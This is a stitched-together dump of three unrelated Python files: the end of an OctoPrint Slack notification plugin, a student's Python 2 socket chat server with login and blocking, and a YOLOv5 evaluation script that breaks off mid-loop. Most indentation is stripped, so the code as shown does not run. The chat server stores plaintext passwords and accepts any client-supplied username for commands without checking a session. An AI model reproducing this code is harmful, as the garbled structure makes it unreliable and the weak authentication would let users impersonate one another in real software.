                ##The grid code is a mess but it was a quick and dirty solution we can rewrite later
if image_count == 1:
grid_size = 1, 1
elif image_count == 2:
grid_size = 2, 1
elif image_count == 3:
grid_size = 2, 2
elif image_count == 4:
grid_size = 2, 2
elif image_count == 5:
grid_size = 3, 2
elif image_count == 6:
grid_size = 3, 2
elif image_count == 7:
grid_size = 3, 3
elif image_count == 8:
grid_size = 3, 3
elif image_count == 9:
grid_size = 3, 3
elif image_count == 10:
grid_size = 4, 3
elif image_count == 11:
grid_size = 4, 3
elif image_count == 12:
grid_size = 4, 3
else:
return None, None
row_count, col_count = grid_size
row_idx = 0
col_idx = 0
for img in images:
if len(grid_row_images) <= row_idx:
grid_row_images.append([])
if len(grid_row_heights) <= row_idx:
grid_row_heights.append([])
if len(grid_col_widths) <= col_idx:
grid_col_widths.append([])
width, height = img.size
grid_row_images[row_idx].append(img)
grid_row_heights[row_idx].append(height)
grid_col_widths[col_idx].append(width)
col_idx += 1
if col_idx == col_count:
col_idx = 0
row_idx += 1
newHeight = 0
newWidth = 0
for row in grid_row_heights:
newHeight += max(row)
for row in grid_col_widths:
newWidth += max(row)
##Now that we have the exact height/width, add some spacing around/between the images
image_spacer = 10
newWidth += image_spacer * 2 ## outer borders
newHeight += image_spacer * 2 ## outer borders
newWidth += (col_count - 1) * image_spacer ##horizontal spacers
newHeight += (row_count - 1) * image_spacer ##vertical spacers
new_im = Image.new("RGB", (newWidth, newHeight))
x_offset = image_spacer
y_offset = image_spacer
if arrangement == "VERTICAL" or arrangement == "HORIZONTAL":
for im in images:
if arrangement == "VERTICAL":
x_adjust = image_spacer
if im.size[0] != max_width:
x_adjust = (max_width - im.size[0]) / 2
new_im.paste(im, (x_adjust, y_offset))
y_offset += im.size[1]
y_offset += image_spacer
elif arrangement == "HORIZONTAL":
y_adjust = image_spacer
if im.size[1] != max_height:
y_adjust = (max_height - im.size[1]) / 2
new_im.paste(im, (x_offset, y_adjust))
x_offset += im.size[0]
x_offset += image_spacer
elif arrangement == "GRID":
row_idx = 0
col_idx = 0
for im in images:
width, height = im.size
row_height = max(grid_row_heights[row_idx])
col_width = max(grid_col_widths[col_idx])
x_adjust = 0
if width < col_width:
x_adjust = (col_width - width) / 2
y_adjust = 0
if height < row_height:
y_adjust = (row_height - height) / 2
new_im.paste(im, (x_offset + x_adjust, y_offset + y_adjust))
col_idx += 1
x_offset += col_width
x_offset += image_spacer
if col_idx == col_count:
y_offset += row_height
y_offset += image_spacer
x_offset = image_spacer
col_idx = 0
row_idx += 1
temp_fd, temp_filename = mkstemp()
os.close(temp_fd)
temp_filename = self.rename_snapshot_filename(temp_filename)
self._logger.debug("Combine image temp filename: " + str(temp_filename))
new_im.save(temp_filename, "JPEG")
statinfo = os.stat(temp_filename)
new_img_size = statinfo.st_size
generate_image_elapsed = time.time() - generate_image_start
self._logger.debug(
"Generated combined image ("
+ octoprint.util.get_formatted_size(new_img_size)
+ ") in "
+ str(round(generate_image_elapsed, 2))
+ " seconds"
)
for im in images:
im.close()
for tmpFile in local_paths:
os.remove(tmpFile)
return temp_filename, None
except Exception as e:
self._logger.exception(
"Error generating combined snapshot image: %s" % (str(e))
)
return None, str(e.message)
active_gcode_events = []
active_gcode_received_events = []
active_gcode_event_regexes = dict()
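    ## Reloads the configured G-code triggers from settings, pre-compiling regex patterns and
    ## splitting them into "sent" and "received" listener lists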
def update_gcode_sent_listeners(self):
try:
self._logger.debug("Updating G-code listeners")
events_str = self._settings.get(["gcode_events"], merged=True)
new_gcode_events = []
new_gcode_received_events = []
new_gcode_event_regexes = dict()
if events_str == None or len(events_str.strip()) == 0:
tmp_gcode_events = []
else:
tmp_gcode_events = json.loads(events_str)
for gcode_event in tmp_gcode_events:
if (
gcode_event["Enabled"] == False
and gcode_event["CommandEnabled"] == False
) or len(gcode_event["Gcode"].strip()) == 0:
continue
if (
"GcodeMatchType" in gcode_event
and gcode_event["GcodeMatchType"] == "Regex"
):
internalName = gcode_event["InternalName"]
regex_text = gcode_event["Gcode"]
if len(regex_text.strip()) == 0:
continue
try:
compiled_regex = re.compile(regex_text)
new_gcode_event_regexes[internalName] = compiled_regex
except Exception as e:
self._logger.exception(
"Failed to compile G-code match regular expression: "
+ regex_text
+ ", Error: "
+ str(e)
)
if not "GcodeType" in gcode_event or gcode_event["GcodeType"] == "sent":
new_gcode_events.append(gcode_event)
else:
new_gcode_received_events.append(gcode_event)
self.active_gcode_events = new_gcode_events
self.active_gcode_received_events = new_gcode_received_events
self.active_gcode_event_regexes = new_gcode_event_regexes
self._logger.debug(
"Active G-code sent events: " + json.dumps(self.active_gcode_events)
)
self._logger.debug(
"Active G-code received events: "
+ json.dumps(self.active_gcode_received_events)
)
except Exception as e:
self._logger.exception("Error loading gcode listener events: %s" % (str(e)))
def sending_gcode(
self, comm_instance, phase, cmd, cmd_type, gcode, *args, **kwargs
):
if (
not gcode
or self.active_gcode_events == None
or len(self.active_gcode_events) == 0
):
return (cmd,)
try:
for gcode_event in self.active_gcode_events:
trigger_gcode = gcode_event["Gcode"]
if "GcodeMatchType" in gcode_event:
match_type = gcode_event["GcodeMatchType"]
else:
match_type = None
if self.evaluate_gcode_trigger(
cmd, gcode_event, match_type, trigger_gcode
):
notification_enabled = gcode_event["Enabled"]
command_enabled = gcode_event["CommandEnabled"]
self._logger.debug(
"Caught sent G-code: "
+ self.remove_non_ascii(cmd)
+ ", NotificationEnabled: "
+ str(notification_enabled)
+ ", CommandEnabled: "
+ str(command_enabled)
)
self.handle_event(
"GcodeEvent", None, {"cmd": cmd}, False, False, gcode_event
)
except Exception as e:
self._logger.exception(
"Error attempting to match sent G-code command to the configured events, G-code: "
+ gcode
+ ", Error: "
+ str(e)
)
return (cmd,)
def received_gcode(self, comm_instance, line, *args, **kwargs):
if (
not line
or self.active_gcode_received_events is None
or len(self.active_gcode_received_events) == 0
):
return line
try:
for gcode_event in self.active_gcode_received_events:
trigger_gcode = gcode_event["Gcode"]
if "GcodeMatchType" in gcode_event:
match_type = gcode_event["GcodeMatchType"]
else:
match_type = None
if self.evaluate_gcode_trigger(
line, gcode_event, match_type, trigger_gcode
):
notification_enabled = gcode_event["Enabled"]
command_enabled = gcode_event["CommandEnabled"]
self._logger.debug(
"Caught received G-code: "
+ self.remove_non_ascii(line)
+ ", NotificationEnabled: "
+ str(notification_enabled)
+ ", CommandEnabled: "
+ str(command_enabled)
)
self.handle_event(
"GcodeEvent",
None,
{"cmd": line},
notification_enabled,
command_enabled,
gcode_event,
)
except Exception as e:
self._logger.exception(
"Error attempting to match received G-code command to the configured events, G-code: "
+ line
+ ", Error: "
+ str(e)
)
return line
def evaluate_gcode_trigger(
self, input_gcode, gcode_event, match_type, trigger_gcode
):
if input_gcode is None or trigger_gcode is None:
    return False
if match_type is None or len(match_type) == 0:
    match_type = "StartsWith"
input_gcode = input_gcode.strip()
trigger_gcode = trigger_gcode.strip()
if len(input_gcode) == 0 or len(trigger_gcode) == 0:
return False
if match_type == "StartsWith":
return input_gcode.startswith(trigger_gcode)
elif match_type == "EndsWith":
return input_gcode.endswith(trigger_gcode)
elif match_type == "Contains":
return trigger_gcode in input_gcode
elif match_type == "Regex":
internalName = gcode_event["InternalName"]
if internalName not in self.active_gcode_event_regexes:
return False
gcode_match_regex = self.active_gcode_event_regexes[internalName]
matches = gcode_match_regex.search(input_gcode)
if matches:
return True
return False
return False
non_ascii_regex = re.compile(r"[^\x00-\x7F]")
def remove_non_ascii(self, text):
    return self.non_ascii_regex.sub(" ", text)
def __plugin_load__():
global __plugin_implementation__
__plugin_implementation__ = OctoslackPlugin()
global __plugin_hooks__
__plugin_hooks__ = {
"octoprint.plugin.softwareupdate.check_config": __plugin_implementation__.get_update_information,
"octoprint.comm.protocol.gcode.sending": __plugin_implementation__.sending_gcode,
"octoprint.comm.protocol.gcode.received": __plugin_implementation__.received_gcode,
}
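# Illustrative usage sketch (not wired into the plugin): how the match types handled by
# evaluate_gcode_trigger above behave. The event dict mirrors the settings JSON parsed in
# update_gcode_sent_listeners; the plugin instance and the M600 values are assumptions
# chosen only for demonstration.
def _gcode_trigger_examples(plugin):
    event = {
        "InternalName": "pause_event",
        "Gcode": "M600",
        "Enabled": True,
        "CommandEnabled": False,
    }
    # plain prefix and substring matching
    assert plugin.evaluate_gcode_trigger("M600 X10", event, "StartsWith", "M600")
    assert plugin.evaluate_gcode_trigger("G1 X10 ; M600", event, "Contains", "M600")
    # regex matching requires a compiled pattern registered under the event's InternalName
    plugin.active_gcode_event_regexes["pause_event"] = re.compile(r"^M600(\s|$)")
    assert plugin.evaluate_gcode_trigger("M600", event, "Regex", "M600")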
|
Server.py
|
'''
Melissa Hollingshed
14198590
Server.py
'''
import socket
import signal
import os
import threading
import time
import sys
from multiprocessing import Lock
RECV_SIZE = 1024
TIMEOUT = 45
LOCKOUT = 60
PORT = 18590
HOST = ''
user_list = []
lock = Lock()
user_lock = 0
# class for users on the client side
class User:
'Common class for all users in this chat program'
def __init__(self, username, password):
self.username = username
self.password = password
self.active = False
self.logged_in = False
self.port = 18590
self.ip = ''
self.mailbox = []
self.blocked_me = {}
self.private_peer = ''
self.locked_out = False
def __str__(self):
return self.username
# find a user by username
def find_user(username):
global user_list
for u in user_list:
if u.username == username:
return u
return None
# multithread safe addition of user
def thread_add_user(user):
global lock
lock.acquire()
try:
user.logged_in = True
finally:
lock.release()
# multithread safe removal of user
def thread_remove_user(user):
global lock
lock.acquire()
try:
user.logged_in = False
user.port = 18590
finally:
lock.release()
# multithread safe heartbeat function
def thread_update_live_user(user):
global lock
lock.acquire()
try:
user.active = True
finally:
lock.release()
# multithread safe update of user port and ip
def thread_add_user_port_ip(user, port, ip):
global lock
lock.acquire()
try:
user.port = int(port)
user.ip = ip
finally:
lock.release()
# multithread safe update of user blocked list
def thread_add_blocking_user(user, blocking_user):
global lock
lock.acquire()
try:
user.blocked_me[blocking_user] = 1
finally:
lock.release()
# multithread safe removal of user blocked list
def thread_remove_blocking_user(user, blocking_user):
global lock
lock.acquire()
try:
del user.blocked_me[blocking_user]
finally:
lock.release()
# multithread safe addition of user peer
def thread_add_private_peer(user, peer):
global lock
lock.acquire()
try:
user.private_peer = peer
finally:
lock.release()
# multithread safe lock out of user
def thread_lock_out_user(user):
global lock
lock.acquire()
try:
user.locked_out = True
finally:
lock.release()
# multithread safe unlock of user
def thread_unlock_out_user(user):
global lock
lock.acquire()
try:
user.locked_out = False
finally:
lock.release()
# multithread safe addition to mailbox
def thread_add_to_mailbox(user, message):
global lock
lock.acquire()
try:
user.mailbox.append(message)
finally:
lock.release()
# multithread safe clearing of mailbox
def thread_clear_mailbox(user):
global lock
lock.acquire()
try:
user.mailbox = []
finally:
lock.release()
# multithread safe check of all the live users
def thread_check_pulse():
global lock
global user_list
lock.acquire()
try:
for user in user_list:
if user.logged_in == True and user.active == False:
user.logged_in = False
broadcast_message(user.username + ' logged out', user.username,
False)
user.active = False
finally:
lock.release()
# launch next pulse thread after TIMEOUT seconds
time.sleep(TIMEOUT)
check = threading.Thread(target=thread_check_pulse)
check.daemon = True
check.start()
return 0
# return string with pretty printed online users
def get_online_users(current_user):
global user_list
username_list = []
for user in user_list:
# do not include offline users and current user
if user.logged_in == True and user is not current_user:
# do not allow blocked users to see
try:
current_user.blocked_me[user.username]
continue
except Exception:
username_list.append(user.username)
return '\n'.join(username_list)
# send messages out to all online clients
def broadcast_message(message, sender, is_login):
global user_list
send_user = find_user(sender)
for user in user_list:
# presence broadcasts and other broadcasts have
# different requirements as far as blocking goes
if is_login:
try:
user.blocked_me[send_user.username]
continue
except Exception:
if user.logged_in == True and user.username != sender:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((user.ip, user.port))
delay_send(sock, 'BCST', message)
except Exception:
print 'client connection closed'
sock.close()
else:
try:
send_user.blocked_me[user.username]
continue
except Exception:
if user.logged_in == True and user.username != sender:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((user.ip, user.port))
delay_send(sock, 'BCST', message)
except Exception:
print 'client connection closed'
sock.close()
# send message through the server to a specific client
def send_message(message, sender, receiver, code):
rec_user = find_user(receiver)
if rec_user == None or receiver == sender:
ret_user = find_user(sender)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((ret_user.ip, ret_user.port))
delay_send(sock, code, receiver + ' is not a valid user.')
except Exception:
# guaranteed delivery, will at least go to mailbox
thread_add_to_mailbox(ret_user, message)
sock.close()
elif rec_user.logged_in == True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((rec_user.ip, rec_user.port))
delay_send(sock, code, message)
except Exception:
# guaranteed delivery, will at least go to mailbox
thread_add_to_mailbox(rec_user, message)
sock.close()
else:
thread_add_to_mailbox(rec_user, message)
# send with a slight delay, fixed some timing issues I was having
def delay_send(connection, code, message):
try:
connection.sendall(code)
time.sleep(.1)
connection.sendall(message)
except Exception:
print 'connection broken'
# check if this port is free, avoid race condition
def check_port_free(port_number):
global user_list
for user in user_list:
if user.port == port_number:
return False
return True
# timeout function to be called by timeout thread
def lock_out_timeout(user):
global LOCKOUT
time.sleep(LOCKOUT)
thread_unlock_out_user(user)
return 0
# add new user to text file
def add_newuser(answer):
print 'Saved! log back in'
# serve the connections
def serve_client(connection):
global user_list
greeting = connection.recv(RECV_SIZE)
'''
PTCK - port check, see if a port is free
HELO - hello, initial greeting to get ready
USER - username, time to get username info from client
AUTH - authentication, getting password and checking if valid
LIVE - heartbeat, checking to see if the client is still online
CMND - command, numerous commands that are outlined below
A minimal client-side sketch of these greetings and the CMND commands follows this function.
'''
if greeting == 'PTCK':
port_to_check = int(connection.recv(RECV_SIZE))
port_free = check_port_free(port_to_check)
if port_free:
delay_send(connection, 'GDPT', '')
else:
delay_send(connection, 'BDPT', '')
elif greeting == 'HELO':
connection.recv(RECV_SIZE)
delay_send(connection, 'NUSER', 'New user? click "y", click any other button for no: ')
elif greeting == "NUSER":
try:
info = connection.recv(RECV_SIZE).split()
except Exception:
print 'connection broke'
delay_send(connection, 'USER', 'LOGIN!\nUsername: ')
elif greeting == 'USER':
try:
info = connection.recv(RECV_SIZE).split()
except Exception:
print 'connection broke'
username = info[0]
port = info[1]
ip = info[2]
file_obj = open('credentials.txt', 'r')
next_line = file_obj.readline()
while next_line != '':
    line = str.split(next_line, '\n')
    line = str.split(line[0], ' ')
    # avoid duplicate User entries; main_thread already loads credentials.txt at startup
    if find_user(line[0]) is None:
        user_list.append(User(line[0], line[1]))
    next_line = file_obj.readline()
file_obj.close()
# check to see if it's a valid username
user = find_user(username)
if user == None:
try:
delay_send(connection, 'FAIL', 'User not found. Try again')
except Exception:
print 'client connection closed'
elif user.locked_out == True:
delay_send(connection, 'FAIL',
'Your account is still locked out\n')
else:
thread_add_user(user)
thread_add_user_port_ip(user, port, ip)
delay_send(connection, 'PASS', 'Password: ')
elif greeting == 'AUTH':
try:
info = connection.recv(RECV_SIZE).split()
except Exception:
print 'connection broke'
username = info[0]
password = info[1]
try_num = int(info[2])
user = find_user(username)
if try_num == 3 and password != user.password:
# launch timeout thread
thread_lock_out_user(user)
t = threading.Thread(target=lock_out_timeout, args=(user,))
t.daemon = True
t.start()
# send sad message
delay_send(connection, 'FAIL', 'Due to multiple login failures, ' +
'your account has been blocked. Please ' +
'try again after ' + str(LOCKOUT) +
' seconds.')
elif password != user.password:
delay_send(connection, 'DENY', 'Invalid Password. ' +
'Please try again\n>Password: ')
else:
if user.logged_in == True:
send_message('Another computer has logged in with your ' +
'username and password.', '', username, 'LOGO')
delay_send(connection, 'SUCC',
'>Welcome to simple chat server!')
time.sleep(.1)
# check mail
if not user.mailbox:
mail = '>No offline messages'
else:
mail = '\n'.join(user.mailbox)
thread_clear_mailbox(user)
delay_send(connection, username,
'>Offline Messages:\n' + mail)
broadcast_message(username + ' logged in', username, True)
elif greeting == 'LIVE':
username = connection.recv(RECV_SIZE)
print 'LIVE: ' + username
user = find_user(username)
if user == None:
print 'user broke off'
elif user.logged_in == False:
print 'user died, no heartbeat'
else:
thread_update_live_user(user)
delay_send(connection, 'LIVE', 'Still living')
elif greeting == 'CMND':
user_input = connection.recv(RECV_SIZE)
username = connection.recv(RECV_SIZE)
user = find_user(username)
input_array = user_input.split()
'''
logout - user.logged_in is marked as False
who - user queries database for online users
sendall - broadcasts message to all online clients
send - messages specific client, online or offline
extra stuff
getaddress - gets IP and port info for P2P
consent - gives client access to P2P information
block - blacklists a given user
unblock - removes given user from blacklist
'''
if user == None:
print 'user broke off'
elif user_input == '\n':
print 'pressed enter'
elif user_input == 'logout':
thread_remove_user(user)
delay_send(connection, 'LOGO', 'logout')
broadcast_message(username + ' logged out', username, True)
elif user_input == 'who':
online_users = get_online_users(user)
delay_send(connection, 'ONLN', online_users)
elif input_array[0] == 'sendall':
delay_send(connection, 'BCST', '')
broadcast_message(username + ': ' + user_input[len('sendall '):],
username, False)
elif input_array[0] == 'send' and len(input_array) > 1:
delay_send(connection, 'MESG', '')
receiver = input_array[1]
# make sure to check for blocking
try:
user.blocked_me[receiver]
send_message('You are blocked by ' + receiver, '',
username, 'MESG')
except Exception:
message = user_input[(len('send ') + len(receiver) + 1):]
send_message(username + ': ' + message, username, receiver,
'MESG')
elif input_array[0] == 'getaddress' and len(input_array) == 2:
contact = input_array[1]
contact_user = find_user(contact)
# check to make sure user is not yourself
if contact_user == None:
delay_send(connection, 'NGET',
contact + ' is not a valid user.')
elif(len(input_array) == 2 and username != contact
and contact_user.logged_in):
try:
user.blocked_me[contact]
delay_send(connection, 'NGET', 'Blocked by ' + contact)
except Exception:
thread_add_private_peer(user, contact)
send_message(username + ' is requesting a private chat. ' +
'To share your IP and port with them, reply saying ' +
'\'consent '+ username +'\'', username, contact, 'RQST')
else:
delay_send(connection, 'NGET', 'Invalid request')
elif input_array[0] == 'consent' and len(input_array) == 2:
contact = input_array[1]
contact_user = find_user(contact)
if contact_user == None:
delay_send(connection, 'NGET',
contact + ' is not a valid user.')
elif len(input_array) == 2 and username != contact:
peer = find_user(contact)
if username == peer.private_peer:
send_message(str(user.port) + ' ' + user.ip + ' ' +
username, username, contact, 'GETA')
else:
send_message(contact + ' has not requested a P2P chat ' +
'with you. Use the getaddress command to start one',
contact, username, 'NGET')
elif input_array[0] == 'block' and len(input_array) == 2:
to_block = input_array[1]
block_user = find_user(to_block)
if block_user == None:
delay_send(connection, 'NGET',
to_block + ' is not a valid user.')
elif len(input_array) == 2 and username != to_block:
thread_add_blocking_user(find_user(to_block), username)
delay_send(connection, 'BLOK', 'User ' + to_block +
' has been blocked')
else:
delay_send(connection, 'NBLK', 'Unable to block user')
elif input_array[0] == 'unblock' and len(input_array) == 2:
to_unblock = input_array[1]
unblock_user = find_user(to_unblock)
if unblock_user == None:
delay_send(connection, 'NGET',
to_unblock + ' is not a valid user.')
elif len(input_array) == 2 and username != to_unblock:
thread_remove_blocking_user(find_user(to_unblock), username)
delay_send(connection, 'UBLK', 'User ' + to_unblock +
' is unblocked')
else:
delay_send(connection, 'NUBK', 'Unable to unblock user')
else:
delay_send(connection, 'RECV', 'Invalid Command: ' + user_input)
connection.close()
return 0
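# Illustrative only (never called by the server): minimal client-side sketches of the
# greeting codes and CMND commands documented in serve_client above. The message layout
# is inferred from the handlers; these are sketches, not a tested client.
def example_client_login(server_host, username, password, listen_port, listen_ip):
    # USER: register "username port ip" on one connection, expect a PASS or FAIL code back
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((server_host, PORT))
    sock.sendall('USER')
    time.sleep(.1)
    sock.sendall(username + ' ' + str(listen_port) + ' ' + listen_ip)
    reply = sock.recv(RECV_SIZE)
    sock.close()
    if reply != 'PASS':
        return False
    # AUTH: send "username password try_number" on a fresh connection, expect SUCC on success
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((server_host, PORT))
    sock.sendall('AUTH')
    time.sleep(.1)
    sock.sendall(username + ' ' + password + ' 1')
    reply = sock.recv(RECV_SIZE)
    sock.close()
    return reply == 'SUCC'
def example_client_command(server_host, username, command_text):
    # CMND: send the raw command line (e.g. 'who' or 'send bob hello') and then the username;
    # the first chunk received back is the reply code (ONLN, BCST, MESG, LOGO, RECV, ...)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((server_host, PORT))
    sock.sendall('CMND')
    time.sleep(.1)
    sock.sendall(command_text)
    time.sleep(.1)
    sock.sendall(username)
    reply = sock.recv(RECV_SIZE)
    sock.close()
    return reply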
# parent process which keeps accepting connections
def main_thread():
global user_list
global PORT
global HOST
if len(sys.argv) != 1:
    print 'usage: python Server.py'
    exit(1)
HOST = ''
PORT = 18590
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
#MAX CLIENTS ARE listening at 3
s.listen(3)
# build all the users
file_obj = open('credentials.txt', 'r')
next_line = file_obj.readline()
while next_line != '':
line = str.split(next_line, '\n')
line = str.split(line[0], ' ')
user_list.append(User(line[0], line[1]))
next_line = file_obj.readline()
# launch the pulse checking daemon
check = threading.Thread(target=thread_check_pulse)
check.daemon = True
check.start()
# continuously running thread manager
while True:
conn, addr = s.accept()
print 'Connected by ', addr
t = threading.Thread(target=serve_client, args=(conn,))
t.start()
# ^C terminate gracefully
def ctrl_c_handler(signum, frame):
exit(0)
# kick off signal handlers and the main thread
def main():
signal.signal(signal.SIGINT, ctrl_c_handler)
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
main_thread()
if __name__ == '__main__':
main()
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
wandb_logger=None,
compute_loss=None,
is_coco=False):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
if isinstance(data, str):
is_coco = data.endswith('coco.yaml')
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader)
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs = 0
if wandb_logger and wandb_logger.wandb:
log_imgs = min(wandb_logger.log_imgs, 100)
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = opt.task if opt.task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb, multi_label=True)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging - Media Panel Plots
if len(wandb_images) < log_imgs and wandb_logger.current_epoch > 0: # Check for test operation
if wandb_logger.current_epoch % wandb_logger.bbox_interval == 0:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb_logger.wandb.Image(img[si], boxes=boxes, caption=path.name))
wandb_logger.log_training_progress(predn, path, names) # logs dsviz tables
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12i' * 2 + '%12.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
